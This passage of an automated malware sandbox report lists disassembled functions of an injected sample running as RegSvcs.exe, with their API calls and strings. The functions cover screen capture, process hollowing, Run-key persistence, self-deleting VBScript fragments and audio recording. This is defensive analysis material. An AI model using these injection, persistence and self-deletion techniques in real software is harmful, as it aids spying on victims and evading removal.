                                    • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                    • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                    • Instruction Fuzzy Hash:
                                    Function 00418E76 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 664 418e76-418ebd CreateDCA CreateCompatibleDC call 419325 667 418ec3-418ede call 419367 664->667 668 418ebf-418ec1 664->668 669 418ee2-418ee4 667->669 668->667 668->669 672 418f36-418f3d call 402093 669->672 673 418ee6-418ee8 669->673 677 418f42-418f4e 672->677 673->672 674 418eea-418f21 call 41939d CreateCompatibleBitmap 673->674 679 418f23-418f2f DeleteDC * 2 674->679 680 418f4f-418f59 SelectObject 674->680 681 418f30 DeleteObject 679->681 682 418f5b 680->682 683 418f6a-418f91 StretchBlt 680->683 681->672 684 418f5c-418f68 DeleteDC * 2 682->684 683->682 685 418f93-418f98 683->685 684->681 686 419014-41901c 685->686 687 418f9a-418faf 685->687 688 41905e-419070 GetObjectA 686->688 689 41901e-419025 686->689 687->686 694 418fb1-418fc5 GetIconInfo 687->694 688->682 693 419076-419088 688->693 691 419027-41904c BitBlt 689->691 692 41904e-41905b 689->692 691->688 692->688 695 41908a-41908c 693->695 696 41908e-419098 693->696 694->686 697 418fc7-419010 DeleteObject * 2 DrawIcon 694->697 698 4190c5 695->698 699 4190c9-4190d2 696->699 700 41909a-4190a4 696->700 697->686 698->699 701 4190d3-41910d LocalAlloc 699->701 700->699 702 4190a6-4190b0 700->702 703 419119-419150 GlobalAlloc 701->703 704 41910f-419116 701->704 702->699 705 4190b2-4190b8 702->705 708 419152-419156 703->708 709 41915b-419170 GetDIBits 703->709 704->703 706 4190c2-4190c4 705->706 707 4190ba-4190c0 705->707 706->698 707->701 708->684 710 419172-419193 DeleteDC * 2 DeleteObject GlobalFree 709->710 711 419198-419260 call 4020df * 2 call 40250a call 403376 call 40250a call 403376 call 40250a call 403376 DeleteObject GlobalFree DeleteDC 709->711 710->672 728 419262-419263 DeleteDC 711->728 729 419265-419289 call 402055 call 401fd8 * 2 711->729 728->729 729->677
                                    APIs
                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                    • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                      • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                    • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                    • DeleteDC.GDI32(00000000), ref: 00418F2A
                                    • DeleteDC.GDI32(00000000), ref: 00418F2D
                                    • DeleteObject.GDI32(00000000), ref: 00418F30
                                    • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                    • DeleteDC.GDI32(00000000), ref: 00418F62
                                    • DeleteDC.GDI32(00000000), ref: 00418F65
                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                    • GetIconInfo.USER32(?,?), ref: 00418FBD
                                    • DeleteObject.GDI32(?), ref: 00418FEC
                                    • DeleteObject.GDI32(?), ref: 00418FF9
                                    • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                    • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                    • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                    • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                    • DeleteDC.GDI32(?), ref: 0041917C
                                    • DeleteDC.GDI32(00000000), ref: 0041917F
                                    • DeleteObject.GDI32(00000000), ref: 00419182
                                    • GlobalFree.KERNEL32(?), ref: 0041918D
                                    • DeleteObject.GDI32(00000000), ref: 00419241
                                    • GlobalFree.KERNEL32(?), ref: 00419248
                                    • DeleteDC.GDI32(?), ref: 00419258
                                    • DeleteDC.GDI32(00000000), ref: 00419263
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                    • String ID: DISPLAY
                                    • API String ID: 479521175-865373369
                                    • Opcode ID: eeea48b2f12328c67a7764adb0283258d44bef4919e0b7e4c041a6272c1fd371
                                    • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                    • Opcode Fuzzy Hash: eeea48b2f12328c67a7764adb0283258d44bef4919e0b7e4c041a6272c1fd371
                                    • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                    Function 004180EF Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 736 4180ef-418118 737 41811c-418183 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 736->737 738 418480 737->738 739 418189-418190 737->739 740 418482-41848c 738->740 739->738 741 418196-41819d 739->741 741->738 742 4181a3-4181a5 741->742 742->738 743 4181ab-4181d8 call 436e90 * 2 742->743 743->738 748 4181de-4181e9 743->748 748->738 749 4181ef-41821f CreateProcessW 748->749 750 418225-41824d VirtualAlloc GetThreadContext 749->750 751 41847a GetLastError 749->751 752 418253-418273 ReadProcessMemory 750->752 753 418444-418478 VirtualFree GetCurrentProcess TerminateProcess 750->753 751->738 752->753 754 418279-41829b 752->754 753->738 754->753 758 4182a1-4182ae 754->758 759 4182c1-4182e3 758->759 760 4182b0-4182b7 758->760 762 4182e5-418322 VirtualFree TerminateProcess 759->762 763 41832d-418354 GetCurrentProcess 759->763 760->759 762->737 766 418328 762->766 763->753 767 41835a-41835e 763->767 766->738 768 418360-418364 767->768 769 418367-418385 call 436910 767->769 768->769 772 4183c7-4183d0 769->772 773 418387-418395 769->773 774 4183f0-4183f4 772->774 775 4183d2-4183d8 772->775 776 418397-4183ba call 436910 773->776 778 4183f6-418413 WriteProcessMemory 774->778 779 418419-418430 SetThreadContext 774->779 775->774 777 4183da-4183ed call 418503 775->777 785 4183bc-4183c3 776->785 777->774 778->753 782 418415 778->782 779->753 783 418432-41843e ResumeThread 779->783 782->779 783->753 787 418440-418442 783->787 785->772 787->740
                                    APIs
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                    • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                    • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                    • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                    • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                    • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                    • ResumeThread.KERNEL32(?), ref: 00418435
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                    • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                    • GetLastError.KERNEL32 ref: 0041847A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                    • API String ID: 4188446516-3035715614
                                    • Opcode ID: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                                    • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                    • Opcode Fuzzy Hash: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                                    • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                    Function 0040D420 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                      • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                      • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                    • ExitProcess.KERNEL32 ref: 0040D7D0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                    • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                    • API String ID: 1861856835-332907002
                                    • Opcode ID: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                                    • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                    • Opcode Fuzzy Hash: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                                    • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                    Function 0040D096 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                      • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                    • ExitProcess.KERNEL32 ref: 0040D419
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                    • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                    • API String ID: 3797177996-2557013105
                                    • Opcode ID: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                                    • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                    • Opcode Fuzzy Hash: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                                    • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                    Function 00412475 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                    • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                    • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                    • GetCurrentProcessId.KERNEL32 ref: 00412541
                                    • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                    • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                    • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                    • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                      • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                    • Sleep.KERNEL32(000001F4), ref: 00412682
                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                    • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                    • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                    • String ID: .exe$8SG$WDH$exepath$open$temp_
                                    • API String ID: 2649220323-436679193
                                    • Opcode ID: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                                    • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                    • Opcode Fuzzy Hash: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                                    • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                    Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                    • SetEvent.KERNEL32 ref: 0041B219
                                    • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                    • CloseHandle.KERNEL32 ref: 0041B23A
                                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                    • API String ID: 738084811-2094122233
                                    • Opcode ID: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                                    • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                    • Opcode Fuzzy Hash: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                                    • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                    Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                    • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                    • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                    • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                    • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                    • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                    • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                    • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                    • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Write$Create
                                    • String ID: RIFF$WAVE$data$fmt
                                    • API String ID: 1602526932-4212202414
                                    • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                    • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                    • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                    • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                    Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                    • API String ID: 1646373207-234082672
                                    • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                    • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                    • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                    • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                    Function 0040CDF9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcslen.LIBCMT ref: 0040CE07
                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                    • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                                    • _wcslen.LIBCMT ref: 0040CEE6
                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                    • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,00000000,00000000), ref: 0040CF84
                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                    • _wcslen.LIBCMT ref: 0040CFC6
                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                    • ExitProcess.KERNEL32 ref: 0040D062
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                    • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe$del$open
                                    • API String ID: 1579085052-1122443586
                                    • Opcode ID: 796ba6405bd8a90df0372751ab310b3abe3628a0db2faaf63edc81667cb98c6a
                                    • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                    • Opcode Fuzzy Hash: 796ba6405bd8a90df0372751ab310b3abe3628a0db2faaf63edc81667cb98c6a
                                    • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                    Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlenW.KERNEL32(?), ref: 0041C036
                                    • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                    • lstrlenW.KERNEL32(?), ref: 0041C067
                                    • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                    • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                    • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                    • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                    • _wcslen.LIBCMT ref: 0041C13B
                                    • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                    • GetLastError.KERNEL32 ref: 0041C173
                                    • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                    • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                    • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                    • GetLastError.KERNEL32 ref: 0041C1D0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                    • String ID: ?
                                    • API String ID: 3941738427-1684325040
                                    • Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                    • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                    • Opcode Fuzzy Hash: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                    • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                    Function 00414D86 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 109libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                    • LoadLibraryA.KERNEL32(?), ref: 00414E17
